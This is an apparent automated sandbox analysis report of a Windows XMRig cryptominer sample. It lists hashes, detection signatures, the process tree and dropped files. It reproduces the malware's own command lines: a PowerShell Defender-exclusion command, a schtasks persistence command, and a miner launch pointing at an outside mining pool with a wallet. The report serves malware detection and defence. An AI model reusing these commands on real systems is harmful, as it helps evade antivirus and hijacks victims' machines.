Analysis

max time kernel: 204s
max time network: 209s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-11-2022 03:09

Static task: static1
Behavioral task: behavioral1
Sample: 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Resource: win7-20220901-en

General

Target: 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Size: 648KB
MD5: 4f17d8dcc61d0dea7dd6c4cd0162b246
SHA1: d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA256: 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512: c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
SSDEEP: 12288:cm+6CtnUrur4tohP1aYZKHbncTnCQB6X/MJiY:x+rpX0tohhZKb+YM
Malware Config
Signatures

XMRig Miner payload (6 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/4352-186-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral2/memory/4352-187-0x0000000140343234-mapping.dmp | xmrig
behavioral2/memory/4352-188-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral2/memory/4352-189-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral2/memory/4352-191-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral2/memory/4352-195-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
Executes dropped EXE (1 IoCs)
Processes:
pid | process
5112 | YHKO.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | YHKO.exe
Uses the VBS compiler for execution (1 TTPs)
Suspicious use of SetThreadContext (1 IoCs)
Processes:
description | pid | process | target process
PID 5112 set thread context of 4352 | 5112 | YHKO.exe | vbc.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Delays execution with timeout.exe (1 IoCs)
Processes:
pid | process
2780 | timeout.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
Processes:
pid | process
4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
1956 | powershell.exe
1956 | powershell.exe
5112 | YHKO.exe
5112 | YHKO.exe
4228 | powershell.exe
4228 | powershell.exe
5112 | YHKO.exe
5112 | YHKO.exe
Suspicious behavior: LoadsDriver (1 IoCs)
Processes:
pid | process
652 | (not recorded)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Token: SeDebugPrivilege | 1956 | powershell.exe
Token: SeDebugPrivilege | 5112 | YHKO.exe
Token: SeDebugPrivilege | 4228 | powershell.exe
Token: SeLockMemoryPrivilege | 4352 | vbc.exe
Token: SeLockMemoryPrivilege | 4352 | vbc.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes:
pid | process
4352 | vbc.exe
Suspicious use of WriteProcessMemory (28 IoCs)
Processes:
description | pid | process | target process
PID 4156 wrote to memory of 1956 | 4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe | powershell.exe
PID 4156 wrote to memory of 1956 | 4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe | powershell.exe
PID 4156 wrote to memory of 876 | 4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe | cmd.exe
PID 4156 wrote to memory of 876 | 4156 | 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe | cmd.exe
PID 876 wrote to memory of 2780 | 876 | cmd.exe | timeout.exe
PID 876 wrote to memory of 2780 | 876 | cmd.exe | timeout.exe
PID 876 wrote to memory of 5112 | 876 | cmd.exe | YHKO.exe
PID 876 wrote to memory of 5112 | 876 | cmd.exe | YHKO.exe
PID 5112 wrote to memory of 4228 | 5112 | YHKO.exe | powershell.exe
PID 5112 wrote to memory of 4228 | 5112 | YHKO.exe | powershell.exe
PID 5112 wrote to memory of 4152 | 5112 | YHKO.exe | cmd.exe
PID 5112 wrote to memory of 4152 | 5112 | YHKO.exe | cmd.exe
PID 4152 wrote to memory of 1952 | 4152 | cmd.exe | schtasks.exe
PID 4152 wrote to memory of 1952 | 4152 | cmd.exe | schtasks.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
PID 5112 wrote to memory of 4352 | 5112 | YHKO.exe | vbc.exe
Processes

C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6C37.tmp.bat""
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\timeout.exe
      command line: timeout 3
      - Delays execution with timeout.exe

    C:\ProgramData\dlllib\YHKO.exe
      command line: "C:\ProgramData\dlllib\YHKO.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"
          - Creates scheduled task(s)

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\dlllib\YHKO.exe
Filesize: 648KB
MD5: 4f17d8dcc61d0dea7dd6c4cd0162b246
SHA1: d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA256: 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512: c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\tmp6C37.tmp.bat
Filesize: 139B
MD5: fb699a1e4c9c67bf7403a42a13d878f7
SHA1: 21528e0c2ec3273b9256d79751d28cfebf963171
SHA256: 5119e44cb283069d19b31c79a1357a7dac1677fd0fbebc8b14831f6abeed17b9
SHA512: f59ec793fdaf2292a203f6a26172723fad7ea8e39e653923a8f480aaf46abc70f2131fad6b2bf3b0d87bf476c2b27e031c5e5cb8a45e673cdd73db9480b42ccb